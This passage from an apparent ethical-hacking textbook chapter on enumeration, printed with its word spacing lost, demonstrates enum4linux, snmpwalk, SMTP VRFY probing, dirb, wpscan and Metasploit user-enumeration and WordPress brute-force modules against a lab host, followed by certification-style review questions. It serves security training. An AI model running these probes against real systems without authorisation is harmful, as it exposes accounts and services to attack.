default,butit’seasyenoughtogetacopyofit.It’sjustaPerlscript,sotorunit,youneedaPerlinterpreter.Thefollowingexampleenumeratesthesharesonaspecifichost,identifiedbyIPaddress.ThetargetsystemisaLinuxsystemrunningSambatoprovideWindowsnetworkingfunctionalityoverSMB.Intheoutput,youwillfindalotofinformationrelatedtohowSambaisconfigured.Asanexample,wecanseethattheworkgroupWORKGROUPisconfigured,whichisawayoforganizingsystemsonalocalnetworkthatareallusingWindows.enum4linuxShareEnumeration[email protected]:~#enum4linux-­S192.168.86.52Startingenum4linuxv0.8.9(http://labs.portcullis.co.uk/application/enum4linux/)onSunJan312:18:252021==========================|TargetInformation|==========================244 Chapter6  Enumeration■Target...........RIDRange........Username.........Password.........KnownUsernames..none192.168.86.52500-­550,1000-­1050''''administrator,guest,krbtgt,domainadmins,root,bin,=====================================================|EnumeratingWorkgroup/Domainon192.168.86.52|=====================================================[+]Gotdomain/workgroupname:WORKGROUP======================================|SessionCheckon192.168.86.52|======================================[+]Server192.168.86.52allowssessionsusingusername'',password''============================================|GettingdomainSIDfor192.168.86.52|============================================DomainName:WASHEREDomainSid:(NULLSID)[+]Can'tdetermineifhostispartofdomainorpartofaworkgroup==========================================|ShareEnumerationon192.168.86.52|==========================================WARNING:The"syslog"optionisdeprecatedSharenameTypeComment-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­homesDiskHomeDirectoriesprint$DiskPrinterDriversIPC$IPCIPCService(bobbieserver(Samba,Ubuntu))ReconnectingwithSMB1forworkgrouplisting.Server-­-­-­-­­-­­-­-­Comment-­-­-­-­­-­-­SimpleNetworkManagementProtocol Workgroup-­-­-­-­-­­-­-­-­WORKGROUP245Master-­-­-­-­-­-­-­STEVEDALLAS[+]Attemptingtomapshareson192.168.86.52Atthebottom,youcanseethedifferentsharenames.ThisincludestheIPC$,whichisusedforinterprocesscommunicationbetweenhosts.Thisallowsformanagementofsystemsremotely.Usingenum4linux,wecanfinallyseethemasterbrowseronthenetwork.ThesystemnamedSTEVEDALLASholdsthecurrentauthoritativelistofallthesystemsonthenetwork.Thisisasystemthathasbeenelectedbyothersystemsonthenetwork,whichessentiallymeansithasvolunteered,andbasedonitscharacteristics,nooneelsehaschallengedit.ThereasonforSTEVEDALLAStobethemasterbrowserisitisoneofonlyacoupleofWindowssystems,andofthetwoorthreethatwereactualWindowssystemsandnotLinuxormacOSrunningSMBservices,STEVEDALLAShasthemostrecentoperatingsystem.UsingSMB-­relatedutilities,wecangatheralotofinformationfromthetargetnetwork.Asnotedearlier,it’sgenerallynecessarytobeonthelocalnetworktobeabletouseanyofthesetools.OnereasonforthiscanbethebroadcastdomainorientationofWindowsnetworking—­announcementsonthelocalnetwork.AnotheristhatWindowsnetworkingportsarecommonlyblockedbyfirewalls.Also,it’sentirelypossiblethatdesktopnetworks,wherethesystemsaremostlikelytobecommunicatingwithSMB,oftenuseprivateaddressesthatmaynotbeexposedtotheoutsideworld.Togettothem,becausetheyarenonroutablebyconvention,you’dhavetobeonanetworkwheretherewouldatleastberoutingrulestogettothosetargetnetworks,meaningthereisnetworkreachability.WhiledesktopsarenottheonlydevicesthatwillcommunicateusingSMB,sinceserversdoaswell,theyarethesystemsthataregoingtobethemostnumerousinmostinstances.Asalways,whenyouarestartingtolookatthedesktops,makesureyouhaveanagreementtolookatthemwithyouremployer.Noteveryonewillwantthedesktopnetworkstobetouchedbecauseitcanimpedeproductivityfortheirusers.Theymayalsofeelliketheyaremostinterestedintraditional,technicalvulnerabilitiesthatareexposedtotheoutsideworld,withoutthinkingaboutlateralmovementwithintheorganizationorthefactthatthedesktopsarethemostcommontargetwithattackerstoday.SimpleNetworkManagementProtocolTheSimpleNetworkManagementProtocol(SNMP)hasbeenaroundsincethelate’80s,thoughithasgonethroughseveraliterations.Thefirstiteration,version1(SNMPv1),wasintroducedin1988.Itcontinuestobeusedinspiteofbeingsupersededbyotherversionsintheinterveningyears.SNMPv1alsoincludesanumberofflawsthatmakeitproblematicfromasecurityperspective.Itisabinaryprotocol,butthereisnoencryptionsupportedwithit.Thismeansanyonewhocanobtainthepacketsbeingtransmittedcandecodeiteasily246 Chapter6  Enumeration■enough.Asecondproblemisthereisveryweakauthentication.SNMPv1usescommunitystringstogainaccess.Youeithergetread-­onlyaccessorgetread-­writeaccess.Thereisnogranularitybeyondthat.Thereisalsonoconceptofusers.Youprovidetheappropriatestringandyougetthatlevelofaccess.Perhapsworse,though,isthefactthatthecommunitystringscommonlyusedaresowellknown.Thestring“public”isusedforread-­only,whilethestring“private”isusedforread-­write.Thisisnothard-­coded,butitisverycommon.Version2 introducedsomefixestowhatwaswidelyknownasaproblematicprotocol.First,itintroducedenhancedauthenticationoverthebasiccommunitystringmodelfromv1.However,alongsidev2camev2c,whichretainedtheimplementationofthecommunitystringsforauthentication.Thismeantthatexistingtoolscouldcontinuetojustusecommunitystringswithouthavingtoimplementanyadditionalauthenticationmechanisms.However,v2andv1areincompatible.Themessagespecificationsinv2aredifferentfromthoseinv1,soevenifyourtoolwasjustusingcommunitystrings,itcouldn’tjustbedroppedinplaceandexpectedtoworkwithanumberofsystemsusingv1.Version3implementedadditionalfixesandisconsideredtobeasignificantimprovementoverthepreviousversions.First,itsupportsencryptionratherthanplaintexttransmissions.Second,itsupportsuser-­basedauthentication.Thismeansyougetbetteraccountabilitytoknowwhoisdoingwhat.Thisisimportant,sinceSNMPcanbeusednotonlytomonitordevicesbutalsotosetparametersontheendpoint.AbasicSNMParchitecturewouldhaveagentsinstalledonendpoints,whileaserversystemcouldbeusedtopollthoseagentsperiodicallytogetmeasurementsformonitoringpurposes.AnSNMPagentcanserveupinformationthatisstoredinmanagementinformationbases(MIBs).TheseMIBsaredefineddatastructures,usingAbstractSyntaxNotationOne(ASN.1).Eachnodeordataelementgetsanobjectidentifier(OID),whichisalongdottedstringofnumericvalues.GettingorsettinganyvaluefromtheagentrequiressupplyingthecorrectOIDthatcorrespondswiththevalueyouarelookingfor.SNMPcansupplyalotofdifferentinformationthatisusefuliftherightMIBsareinstalledandoperatingcorrectlyontheagent.Thiscanincludethingslikethesystemnameandtheversionofthekernelbeingrunonthesystem.Inthefollowingexample,youcanseetheuseoftheprogramsnmpwalkto“walk”theMIBtreetogatherdatafromtheagent.Thisstartsatthetoplevelofthetreeandgatherswhatitcanfindthere.Fromtheoutputofsnmpwalk,youcanseethesystemnameaswellasthekernelidentifier.Additionally,youcanseesomecontactinformationthatwasconfiguredintheSNMPagent.snmpwalkof LinuxSystem[email protected]:~#snmpwalk-­v1-­cpublic192.168.86.52iso.3.6.1.2.1.1.1.0=STRING:"Linuxbobbie4.15.0-­30-­generic#32-­UbuntuSMPSunJan417:42:43UTC2021x86_64"iso.3.6.1.2.1.1.2.0=OID:iso.3.6.1.4.1.8072.3.2.10iso.3.6.1.2.1.1.3.0=Timeticks:(7606508)21:07:45.08iso.3.6.1.2.1.1.4.0=STRING:"Foo"iso.3.6.1.2.1.1.5.0=STRING:"bobbie"iso.3.6.1.2.1.1.6.0=STRING:"Erie,CO"SimpleMailTransferProtocol 247iso.3.6.1.2.1.1.7.0=INTEGER:72iso.3.6.1.2.1.1.8.0=Timeticks:(1)0:00:00.01iso.3.6.1.2.1.1.9.1.2.1=OID:iso.3.6.1.6.3.11.3.1.1iso.3.6.1.2.1.1.9.1.2.2=OID:iso.3.6.1.6.3.15.2.1.1iso.3.6.1.2.1.1.9.1.2.3=OID:iso.3.6.1.6.3.10.3.1.1iso.3.6.1.2.1.1.9.1.2.4=OID:iso.3.6.1.6.3.1iso.3.6.1.2.1.1.9.1.2.5=OID:iso.3.6.1.6.3.16.2.2.1iso.3.6.1.2.1.1.9.1.2.6=OID:iso.3.6.1.2.1.49iso.3.6.1.2.1.1.9.1.2.7=OID:iso.3.6.1.2.1.4iso.3.6.1.2.1.1.9.1.2.8=OID:iso.3.6.1.2.1.50iso.3.6.1.2.1.1.9.1.2.9=OID:iso.3.6.1.6.3.13.3.1.3iso.3.6.1.2.1.1.9.1.2.10=OID:iso.3.6.1.2.1.92ThereareanumberofMIBsthatcanbepulledthatwillyieldessentialinformation.Oneoftheseistheinterfacetable,ifTable.IfyouwalktheifTable,youwillgetalistofalloftheinterfacesonthesystemandhowtheyareconfigured.Inatierednetworkdesign,youcangetanunderstandingofadditionalnetworksthesystemmaybeconnectedto.Withthisinformation,youcancontinuetobuildoutthenetworkmapyouhavebeencreatingasyouidentifynetworksandsystems.OneadvantagetoSNMPisthatitisperhapsmostcommonlyusedonnetworkequipmentlikeroutersandswitches.Asthesemaynothavetraditionalmeansofgainingaccessandmaynothavemoretraditionalideasofusers,usingSNMPtogatherinformationfromthesedevicescanbeagoodentrypoint.Asusual,though,aprotocollikeSNMPisgenerallydisabledthroughfirewalls.Inotherwords,youwouldusuallyhavetobeallowedspecificaccesstothenetworkdevicethroughafirewalloraccesscontrollistbeforeyoucouldstarttorequestMIBdatafromanetworkdevice.SNMPagentsthatareproperlyimplementedandconfiguredshouldn’tjustgiveoutsensitivesysteminformationtoanyonewhoasksforit.SimpleMailTransferProtocolLikesomanyotherprotocols,SMTPoperatesusingaseriesofverbstointeractwiththeserver.TheclientsendsaverbandanyothernecessaryparameterstotheSMTPserver.Basedontheverb,theserverknowshowtohandletheparametersreceived.Unlikeother,simplerprotocols,though,communicatingwithSMTPisanentireconversation.Beforeyoustart,youhavetogreettheserver.ThistellstheserverwhatflavorofSMTPyouaregoingtobespeaking.Youthentelltheserverwhatyouwanttodo.Basedonthefunctionyouaretryingtoperform,youmayhavetoprovideadditionalinformation.Thismayincludeprovidingcredentials.YoucanseeanexampleofasimpleSMTPconversationnext.Thisisentirelymanual,soyoucanseetheconversationattheprotocollevelandhowyoumightinteractwithanSMTPserver.248 Chapter6  Enumeration■SMTPConversation[email protected]:~#nc192.168.86.5225220bobbie.lanESMTPPostfix(Ubuntu)EHLOblah.com250-­bobbie.lan250-­PIPELINING250-­SIZE10240000250-­VRFY250-­ETRN250-­STARTTLS250-­ENHANCEDSTATUSCODES250-­8BITMIME250-­DSN250SMTPUTF8MAILFrom:[email protected]2502.1.0OkRCPTTo:[email protected]2502.1.5OkDATA354Enddatawith.From:GooberTo:SomeoneDate:todaySubject:HiNothingreallytosay..2502.0.0Ok:queuedas33471301389OnceyouinitiatetheconversationusingeitherHELOorEHLO,youwillgetalistofcapabilitiesofferedbytheserver.ThereareacoupleofcapabilitiesinSMTPthatwecanusetoenumerateusersoratleastemailaddresses.OneofthemyoucanseeisVRFY,whichcanbeusedtoverifyusers.Notallmailserverswillhavethisfeatureenabled,sinceitcanbeusedtoidentifylegitimateusersoremailaddresses.Thatmeansitcanbeusedbyattackersaswellasspammers.HereyoucanseeanexampleoftheuseofVRFYagainstalocalmailserverrunningPostfix,whichhasVRFYenabledbydefault.TestingVRFY[email protected]:~#nc192.168.86.5225220bobbie.lanESMTPPostfix(Ubuntu)SimpleMailTransferProtocol 249EHLOblah.com250-­bobbie.lan250-­PIPELINING250-­SIZE10240000250-­VRFY250-­ETRN250-­STARTTLS250-­ENHANCEDSTATUSCODES250-­8BITMIME250-­DSN250SMTPUTF8VRFY[email protected]2522.0.0[email protected]VRFY[email protected]2522.0.0[email protected]VRFYroot2522.0.0rootWedon’tgetanythingbackfromourattemptsexceptastatuscode.Thereisnotextindicatingwhattheserverthinksofourrequest.Thatmeansweneedtolookupthenumericvalueweget.Unliketheearliercase,wherewegot250,whichmeanssuccess,thistimewegotastatus252.Thismeansthattheaddresscan’tbeverifiedbuttheserverwillattempttodeliverthemessage.WhileVRFYisenabledonthisserver,wedon’tgetalotofusefulinformation.Ontopofthat,runningthroughthismanuallyisverytime-­consuming.Wecoulddoitmanually.Metasploitagaintotherescue,though.Themodulesmtp_enumwilltakeawordlistanddothesamethingautomaticallythatyousawdonemanuallyearlier.Itwillrunthroughalltheusersinthewordlist,checkingtoseewhethereachuserexists.Therearetwowaystotestwhetherusersexist—­eithertheVRFYcommandortheMAILTOcommand.Inthefollowinglisting,youcanseetheresultsofarunagainstthesameserver.ThisisusingthedefaultwordlistthatcomeswithMetasploitthathasalistofcommonUnixusernames(unix_users.txt).smtp_enumRunmsfauxiliary(scanner/smtp/smtp_enum)>useauxiliary/scanner/smtp/smtp_enummsfauxiliary(scanner/smtp/smtp_enum)>setRHOSTS192.168.86.52/32RHOSTS=>192.168.86.52/32msfauxiliary(scanner/smtp/smtp_enum)>run[*]192.168.86.52:25-­192.168.86.52:25Banner:220bobbie.lanESMTPPostfix(Ubuntu)250 Chapter6  Enumeration■[+]192.168.86.52:25-­192.168.86.52:25Usersfound:,backup,bin,daemon,games,gnats,irc,list,lp,mail,man,messagebus,news,nobody,postmaster,proxy,sshd,sync,sys,syslog,uucp,www-­data[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedYou’llnoticethattherearealotofuserslistedasbeingfoundbythismodule.BasedonthefactthattheVRFYcommandreturneda252andtheusersareonesthatexistonthissystem,themoduleisn’tusingVRFY.Instead,it’susingtheMAILTOcommand.Usersthatdon’texistwillresultina550statuscode.Usersthatdoexistwillreturna250 whenmailisattemptedtothatuser.Basedontheresultsofthis,themodulereturnsvalidusernames,sinceoutofthe112usersinthelist,only21userswereidentified.ThereisanothercommandthatcanbeusedonSMTPservers,thoughitistargetedatmailinglists.Ifyoufindamailinglistaddressthatbelongstoadomain,youmaybeabletouseEXPNtoexpandthemailinglist,whichmeansidentifyingtheemailaddressesthatareonthatmailinglist.Thisfunction,though,requiresthattheserversupportenhancedSMTP(ESMTP).YoucantestwhetheraserversupportsESMTPbycheckingtoseewhetheritacceptsEHLO,whichistheESMTPversionofHELO.Web-­BasedEnumerationAsfarasenumerationgoes,theremaybeacoupleofthingswewanttolookatonwebservers.Thefirstistoidentifydirectoriesavailableinawebsite.Therearealotofdifferentwaystodothis,especiallyifyouhaveaccesstowebapplicationtestingtools.Evenifyoudon’toraren’tfamiliarwithusingthem,therearesimplewaysofchecking.Allyouneedisawordlistthatcanprovidepotentialdirectorynamesandatoolthatcanmakerequeststoawebserverbasedonthosewords—­appendingeachwordtoabaseUniformResourceLocator(URL).Here,youcanseetheuseoftheprogramdirb,whichincludesitsownwordlistofcommondirectorynames.ThiswasrunagainstawebserveronmyownnetworkthathadtheWordPressdistributionunzippedintothebasewebdirectory.dirbDirectoryTesting[email protected]:~#dirbhttp://192.168.86.52/-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­DIRBv2.22ByTheDarkRaver-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­START_TIME:SunJan419:38:362021URL_BASE:http://192.168.86.52/Web-­BasedEnumeration 251WORDLIST_FILES:/usr/share/dirb/wordlists/common.txt-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­GENERATEDWORDS:4612-­-­-­-­ScanningURL:http://192.168.86.52/-­-­-­-­+http://192.168.86.52/index.php(CODE:200|SIZE:418)==>DIRECTORY:http://192.168.86.52/wp-­admin/==>DIRECTORY:http://192.168.86.52/wp-­content/==>DIRECTORY:http://192.168.86.52/wp-­includes/+http://192.168.86.52/xmlrpc.php(CODE:200|SIZE:3065)-­-­-­-­Enteringdirectory:http://192.168.86.52/wp-­admin/-­-­-­-­+http://192.168.86.52/wp-­admin/admin.php(CODE:200|SIZE:10531)==>DIRECTORY:http://192.168.86.52/wp-­admin/css/==>DIRECTORY:http://192.168.86.52/wp-­admin/images/==>DIRECTORY:http://192.168.86.52/wp-­admin/includes/+http://192.168.86.52/wp-­admin/index.php(CODE:200|SIZE:7265)==>DIRECTORY:http://192.168.86.52/wp-­admin/js/==>DIRECTORY:http://192.168.86.52/wp-­admin/maint/==>DIRECTORY:http://192.168.86.52/wp-­admin/network/==>DIRECTORY:http://192.168.86.52/wp-­admin/user/Whatwe’vedonesofaristocheckknownorexpecteddirectoriesonawebserver.Usingawordlistdoesn’tguaranteethatyouaregoingtoidentifyalldirectoriesthatareavailableontheserver.Ifadirectoryisn’tinthewordlist,itwon’tbeidentified.Wecanturntoanothertooltohelpwithfuzzingdirectorynames,meaninggeneratingnamesdynamicallybasedonasetofrules.YoumayexpectatthispointthatwewouldturntoMetasploitbecauseit’ssouseful.You’dbecorrect.Wecanusethebrute_dirsmodule.Usingthismodule,yousetaformatforwhatadirectorynamecouldorshouldlooklikeandthemodulewillrunthroughallpossiblenamesthatmatchtheformat.Hereyoucanseetheoptionsavailableforthemodule,followedbyaformatset.We’regoingtobetestingagainstallwordswithlowercasecharacterswhoselengthsarebetweenoneandeightcharacters.brute_dirsMetasploitModulemsf>useauxiliary/scanner/http/brute_dirsmsfauxiliary(scanner/http/brute_dirs)>infoName:HTTPDirectoryBruteForceScannerModule:auxiliary/scanner/http/brute_dirsLicense:BSDLicenseRank:Normal252 Chapter6  Enumeration■Providedby:etBasicoptions:NameCurrentSettingRequiredDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­FORMATa,aa,aaayesTheexpecteddirectoryformat(aalpha,ddigit,Aupperalpha)PATH/yesThepathtoidentifydirectoriesProxiesnoAproxychainofformattype:host:port[,type:host:port][...]RHOSTS192.168.86.52yesThetargetaddressrangeorCIDRidentifierRPORT80yesThetargetport(TCP)SSLfalsenoNegotiateSSL/TLSforoutgoingconnectionsTHREADS1yesThenumberofconcurrentthreadsVHOSTnoHTTPservervirtualhostDescription:Thismoduleidentifiestheexistenceofinterestingdirectoriesbybruteforcingthenameinagivendirectorypath.msfauxiliary(scanner/http/brute_dirs)>setFORMATa,aa,aaa,aaaa,aaaaa,aaaaaa,aaaaaaa,aaaaaaaaFORMAT=>a,aa,aaa,aaaa,aaaaa,aaaaaa,aaaaaaa,aaaaaaaamsfauxiliary(scanner/http/brute_dirs)>run[*]Usingcode'404'asnotfound.Metasploit,asalways,hasalargenumberofmodulesthatcanbeusedforweb-­basedenumerationbeyondjustidentifyingdirectoriesonthewebserver.Asyoustartworkingwithwebsitesand,morespecifically,webapplications,youwillrunacrossalotofopensourceapplicationsthatarewellknownbecausetheyaresocommonlyused.Asanexample,youmayfindaWordPressinstallation.AgainusingMetasploit,wecanenumeratetheusersintheWordPressinstallation.Thewordpress_login_enummodulecantakeauserfileorapasswordfile,oryoucouldprovideasingleusernamewithapasswordfileorasinglepasswordwithausernamefile.Thereareanumberofotheroptionsthatcanbesetinthemodule,providingalotofcapabilities.HereyoucanseerunningthemoduleagainstalocalinstallationofWordPress.Web-­BasedEnumeration 253EnumeratingUsernamesin Wordpressmsfauxiliary(scanner/http/wordpress_login_enum)>setBLANK_PASSWORDStrueBLANK_PASSWORDS=>truemsfauxiliary(scanner/http/wordpress_login_enum)>setRHOSTS192.168.86.52RHOSTS=>192.168.86.52msfauxiliary(scanner/http/wordpress_login_enum)>run[*]/-­WordPressVersion4.9.8detected[*]192.168.86.52:80-­/-­WordPressUser-­Enumeration-­RunningUserEnumeration[+]/-­Founduser'kilroy'withid1[+]/-­Usernamesstoredin:/root/.msf4/loot/20210104205530_default_192.168.86.52_wordpress.users_790698.txt[*]192.168.86.52:80-­/-­WordPressUser-­Validation-­RunningUserValidation[*]192.168.86.52:80-­[1/0]-­/-­WordPressBruteForce-­RunningBruteforce[*]/-­Brute-­forcingpreviouslyfoundaccounts...[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedYou’llnoticeitmakesreferencetostoringtheusernameinafileinthehomedirectoryoftherootuser,whichistheuserunderwhichmsfconsoleisrunning.Metasploitalsostoresthisinformation.Anytimeyouwanttochecktoseewhatyouhavegrabbedintermsofinformationlikecredentials,youcanrunthecommandlootinsidemsfconsole.Youcanseetheresultsofthiscommandhere.Listinglootin msfconsolemsfauxiliary(scanner/http/wordpress_login_enum)>lootLoot====hostservicetypenamecontentinfopath-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­­-­-­-­­-­-­­­-­-­­-­192.168.86.52wordpress.users192.168.86.52_wordpress_users.txttext/plain/root/.msf4/loot/20210104205530_default_192.168.86.52_wordpress.users_790698.txt254 Chapter6  Enumeration■WhenitcomestoWordPress,wedon’thavetorelyonMetasploit.Again,wecanrelyonKaliLinuxbecauseit’sfreelyavailableandeasytouse,nottomentionthattherearehundredsoftoolsthatareavailable.Kalicomeswiththeprogramwpscanthatcanbeusedtoenumeratenotonlyusers,butalsothemesandplugins.WhenitcomestoawebapplicationlikeWordPress,thepluginscanalsobeusefultoknowaboutbecausetheymayalsointroducevulnerabilities.Theydoincludeadditionalcode,afterall.Inthefollowinglisting,youcanseearunofwpscan,whereweenumeratetheplugins.Youwillalsonoticethatwhileitwasrunning,itdetectedtheuserthatisconfigured.EnumeratingPluginsin Wordpress[email protected]:~#wpscan-­-­urlhttp://192.168.86.52-­-­enumeratep_____________________________________________________________________________\\//__\/____|\\/\//||__)|(____________®\\/\//|___/\___\/__|/_`|'_\\/\/||____)|(__|(_|||||\/\/|_||_____/\___|\__ˊ_|_||_|WordPressSecurityScannerbytheWPScanTeamVersion2.9.4SponsoredbySucuri-­https://sucuri.net@_WPScan_,@ethicalhack3r,@erwan_lr,@_FireFart________________________________________________________________[+]URL:http://192.168.86.52/[+]Started:SunJan321:20:592021[+]Interestingheader:LINK:;rel="https://api.w.org/"[+]Interestingheader:SERVER:Apache/2.4.29(Ubuntu)[+]XML-­RPCInterfaceavailableunder:http://192.168.86.52/xmlrpc.php[HTTP405][+]FoundanRSSFeed:http://192.168.86.52/index.php/feed/[HTTP200][!]Detected1userfromRSSfeed:+-­-­-­-­-­-­-­-­+|Name|+-­-­-­-­-­-­-­-­+|kilroy|+-­-­-­-­-­-­-­-­+Web-­BasedEnumeration [!]Uploaddirectoryhasdirectorylistingenabled:http://192.168.86.52/wp-­content/uploads/[!]Includesdirectoryhasdirectorylistingenabled:http://192.168.86.52/wp-­includes/[+]EnumeratingWordPressversion...[+]WordPressversion4.9.8(Releasedon2018-­08-­02)identifiedfromadvancedfingerprinting,metagenerator,linksopml,stylesheetsnumbers[+]WordPressthemeinuse:twentyseventeen-­v1.7[+]Name:twentyseventeen-­v1.7|Latestversion:1.7(uptodate)|Lastupdated:2018-­08-­02T00:00:00.000Z|Location:http://192.168.86.52/wp-­content/themes/twentyseventeen/|Readme:http://192.168.86.52/wp-­content/themes/twentyseventeen/README.txt|StyleURL:http://192.168.86.52/wp-­content/themes/twentyseventeen/style.css|ThemeName:TwentySeventeen|ThemeURI:https://wordpress.org/themes/twentyseventeen/|Description:TwentySeventeenbringsyoursitetolifewithheadervideoandimmersivefeaturedimages.Witha...|Author:theWordPressteam|AuthorURI:https://wordpress.org/[+]Enumeratinginstalledplugins(onlyonesmarkedaspopular)...Time:00:00:00(1494/1494)100.00%Time:00:00:00[+]Wefound5plugins:[+]Name:akismet-­v4.0.8|Latestversion:4.0.8(uptodate)|Lastupdated:2018-­06-­19T18:18:00.000Z255256 Chapter6  Enumeration■||Location:http://192.168.86.52/wp-­content/plugins/akismet/Readme:http://192.168.86.52/wp-­content/plugins/akismet/readme.txt[+]Name:gutenberg-­v3.6.1|Lastupdated:2018-­08-­17T15:50:00.000Z|Location:http://192.168.86.52/wp-­content/plugins/gutenberg/|Readme:http://192.168.86.52/wp-­content/plugins/gutenberg/readme.txt|Changelog:http://192.168.86.52/wp­content/plugins/gutenberg/changelog.txt[!]Theversionisoutofdate,thelatestversionis3.6.2[!]Directorylistingisenabled:http://192.168.86.52/wpcontent/plugins/gutenberg/­[+]Name:jetpack-­v6.4.2|Latestversion:6.4.2(uptodate)|Lastupdated:2018-­08-­10T14:33:00.000Z|Location:http://192.168.86.52/wp-­content/plugins/jetpack/|Readme:http://192.168.86.52/wp-­content/plugins/jetpack/readme.txt|Changelog:http://192.168.86.52/wp-­content/plugins/jetpack/changelog.txt[!]Directorylistingisenabled:http://192.168.86.52/wp-­content/plugins/jetpack/[+]||||Name:tablepress-­v1.9Latestversion:1.9(uptodate)Lastupdated:2017-­12-­03T19:57:00.000ZLocation:http://192.168.86.52/wp-­content/plugins/tablepress/Readme:http://192.168.86.52/wp-­content/plugins/tablepress/readme.txt[+]||||Name:wordfence-­v7.1.10Latestversion:7.1.10(uptodate)Lastupdated:2018-­07-­31T17:48:00.000ZLocation:http://192.168.86.52/wp-­content/plugins/wordfence/Readme:http://192.168.86.52/wp-­content/plugins/wordfence/readme.txt[+][+][+][+]Finished:SunJan321:21:062021Elapsedtime:00:00:06Requestsmade:1588Memoryused:103.09MBSummary 257Inadditiontouserandpluginenumeration,wpscanidentifiedacoupleofissueswiththeWordPressinstallation,sothosecanbeuseddowntheroad.ItalsoidentifiedaheaderfromtheHTTPcommunicationthatitfelttobeinterestingbecauseitincludedthenameoftheproductaswellastheversionandtheoperatingsystem.Alloftheseareusefulpiecesofinformationtohave.Thesearen’ttheonlythingswecanenumeratewhenitcomestowebapplications.Wecouldscannetworksfordifferentwebapplicationsorlooktoenumerateusers.Lookingfordirectoriesthatareonthewebserverisalsousefulbecauseitcanhelpusidentifyapplicationsaswellasdatathatmaybeavailable.SummaryEnumerationistheprocessofgatheringalotofinformationfurtherupthenetworkstackthanjustIPaddressesandports.Atthispoint,wearemovinguptotheApplicationlayer.We’relookingforthingslikeusernames,wherewecanfindthem,andnetworksharesandanyotherfootholdswemaybeabletogather.Toaccomplishthisenumerationwork,thereareanumberofprotocolsandtoolsthatwecanuse.Thefirstisnmap,becauseweneedtogobeyondjustidentifyingopenports.Weneedtoidentifytheservicesthatareinuse,includingthesoftwarebeingused.Onefeatureofnmapthatisuseful,especiallyinthesecircumstances,isitsscriptingcapability.Thisincludes,especially,allthescriptsthatarebuiltintonmap.Whenitcomestonmap,therearescriptsthatcanbeusednotonlytoprobeservicesforadditionaldetailsbuttotakeadvantageofthemanyenumerationcapabilities.OneoftheprotocolswecanspendtimelookingatistheSMBprotocol.nmapincludesanumberofscriptsthatwillprobesystemsthatuseSMB.Thisincludesidentifyingsharesthatmaybeopenaswellaspotentiallyusersandothermanagement-­relatedinformationthatcanbeaccessedusingSMB.SMBreliesonRPCs.NFS,afilesharingprotocoldevelopedbySunMicrosystems,alsousesRPC.WecanusenmaptoenumerateRPCservices,sincetheseservicesregisterdynamicallywithamappingorregistryservice.ProbingtheRPCserverwillprovidedetailsabouttheprogramsandportsthatareexportingRPCfunctionality.IftheprogramiswritteninJava,itwilluseRMIinsteadofportmaportheSunRPCprotocol.AnotherprogramyoucanuseacrossanumberofprotocolsforenumerationisMetasploit.MetasploitcomeswithlotsofmodulesthatwillenumeratesharesandusersonSMB,servicesusingSunRPC,andanumberofotherprotocols.Ifthereisinformationthatcanbeenumerated,Metasploitprobablyhasamodulethatcanberun.ThisincludesmodulesthatwillenumerateusersinmailserversoverSMTP.YoucanalsoenumerateinformationusingSNMP.Ofcourse,whenitcomestoSNMP,youcanalsousetoolslikesnmpwalk.WhileMetasploitcanbeusedacrossalotofdifferentprotocolstolookfordifferentpiecesofusefulinformation,itisnottheonlytoolyoucanuse.Therearebuilt-­intools258 Chapter6  Enumeration■forgatheringinformationfromSMB,forexample.You’remorelikelytofindthosetoolsonWindowssystems,butyoucanalsofindtoolsonLinuxsystems,especiallyifyouhaveSambainstalled.SambaisasoftwarepackagethatimplementstheSMBprotocolonUnix-­likesystems.Therearealsoalotofopensourcetoolsthatcanbeusedfordifferentprotocols.IfyouareokaywithusingLinux,KaliLinuxisadistributionthatincludeshundredsofsecurity-­relatedtools.Asyouareperformingthisenumeration,youshouldbetakingnotessoyouhavereferenceswhenyouaregoingforward.OneadvantagetousingMetasploit,nottooversellthissoftware,isthatitusesadatabasebackend,whichwillstorealotofinformationautomatically.Thisiscertainlytrueofservicesandportsbutalsoofusernamesthathavebeenidentified.ThisisnottosaythatMetasploitcanbeusedtostoreeveryaspectofyourengagement,butyoucanrefertodetailslaterbyqueryingtheMetasploitdatabaseasneeded.ReviewQuestions ReviewQuestionsYoucanfindtheanswersintheappendix.1.WhatareRPCsprimarilyusedfor?A.InterprocesscommunicationsB.InterprocesssemaphoresC.RemotemethodinvocationD.Processdemandpaging2.Whatwouldyoubetryingtoenumerateifyouweretouseenum4linux?A.ProceduresB.Linux-­basedservicesC.Sharesand/orusersD.Memoryutilization3.HowdoyouauthenticatewithSNMPv1?A.Username/passwordB.HashC.PublicstringD.Communitystring4.WhatSMTPcommandwouldyouusetogetthelistofusersinamailinglist?A.EXPDB.VRFYC.EXPND.VRML5.Whattypeofenumerationwouldyouusetheutilitydirbfor?A.DirectorylistingsB.DirectoryenumerationC.Brute-­forcedialingD.Userdirectoryanalysis6.WhataredatadescriptionsinSNMPcalled?A.Management-­basedinformationB.DatastructuredefinitionC.ExtensiblemarkuplanguageD.Managementinformationbase259260 Chapter6  Enumeration■7.WhatistheprocessJavaprogramsidentifythemselvestoiftheyaresharingproceduresoverthenetwork?A.RMIregistryB.RMImapperC.RMIdatabaseD.RMIprocess8.Youareworkingwithacolleague,andyouseetheminteractingwithanemailserverusingtheVRFYcommand.Whatisityourcolleagueisdoing?A.VerifyingSMTPcommandsB.VerifyingmailinglistsC.VerifyingemailaddressesD.Verifyingtheserverconfig9.WhatistheSMBprotocolusedfor?A.DatatransfersusingNFSB.DatatransfersonWindowssystemsC.DatatransfersforemailattachmentsD.DatatransfersforWindowsRegistryupdates10.Whichoftheseisabuilt-­inprogramonWindowsforgatheringinformationusingSMB?A.nmblookupB.smbclientC.MetasploitD.nbtstat11.WhatstatuscodewillyougetifyourattempttousetheVRFYcommandfails?A.550B.501C.250D.20012.Whatprogramwouldyouusetoenumerateservices?A.smbclientB.NmapC.enum4linuxD.snmpwalkReviewQuestions 